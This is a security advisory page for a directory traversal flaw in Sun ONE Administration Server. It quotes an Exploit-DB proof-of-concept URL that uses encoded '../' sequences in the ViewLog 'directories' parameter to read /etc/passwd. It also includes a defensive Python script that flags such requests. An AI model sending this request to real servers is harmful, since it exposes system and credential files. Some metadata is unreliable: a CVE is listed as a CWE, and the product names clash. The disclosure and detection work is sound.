Vendor: Sun ONE Application Server
By: SecurityFocus
CVSS: 7.5 (HIGH)
Directory Traversal
CWE: 22
Product Name: Sun ONE Application Server
Affected Version From: Sun ONE Administration Server 5.1
Affected Version To: Sun ONE Administration Server 6.0
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: a:sun:sun_one_application_server:5.1
Platforms Tested: Windows, Linux, Mac
2002

Directory Traversal in Sun ONE Administration Server

A directory traversal vulnerability exists in the Sun ONE Administration Server due to insufficient input validation. An attacker can exploit this vulnerability by sending the server a specially crafted HTTP request that contains directory traversal sequences such as '../../../../etc/passwd'. This allows the attacker to access sensitive information, such as the server's password file.

Mitigation:

Sun has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8367/info

A problem in the checking of input by the Sun ONE Administration Server may lead to remote users escaping into restricted directories. This may allow an attacker to gain access to information that is sensitive in nature.

http://www.example.com:5000/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
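
An added example (not part of the original advisory and not Sun's code): a defender-side check that decodes the `directories` and `file` parameters of a ViewLog request, resolves the path they select, and flags requests that land outside the log directory. The install root `/opt/sunone`, the assumption that `directories` is joined to that root, and the first sample request are constructed for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

SERVER_ROOT = "/opt/sunone"       # assumed install root (not given on the page)
LOG_SUBDIR = "admin-serv/logs"    # directory ViewLog is meant to read from

def _decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")   # treat Windows separators the same way

def viewlog_target(request, server_root=SERVER_ROOT):
    """Normalized filesystem path selected by 'directories' and 'file'."""
    query = parse_qs(urlsplit(request).query, keep_blank_values=True)
    directories = _decode(query.get("directories", [""])[0])
    filename = _decode(query.get("file", [""])[0])
    return posixpath.normpath(posixpath.join(server_root, directories, filename))

def escapes_log_dir(request, server_root=SERVER_ROOT, log_subdir=LOG_SUBDIR):
    """True when the resolved path falls outside the intended log directory."""
    allowed = posixpath.normpath(posixpath.join(server_root, log_subdir))
    target = viewlog_target(request, server_root)
    return posixpath.commonpath([allowed, target]) != allowed

def flag_requests(requests):
    """Return the ViewLog requests whose target leaves the log directory."""
    return [r for r in requests
            if "/tasks/configuration/ViewLog" in urlsplit(r).path
            and escapes_log_dir(r)]

# Constructed sample input: one ordinary log view, plus the request from the advisory.
SAMPLE_REQUESTS = [
    "/admin-serv/tasks/configuration/ViewLog?file=access&num=25&str=&directories=admin-serv%2Flogs&id=admin-serv",
    "/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("traversal:", viewlog_target(hit), "<-", hit)
```

The same containment test, applied to the canonical path before the file is opened, is the server-side form of the input validation the advisory says was insufficient.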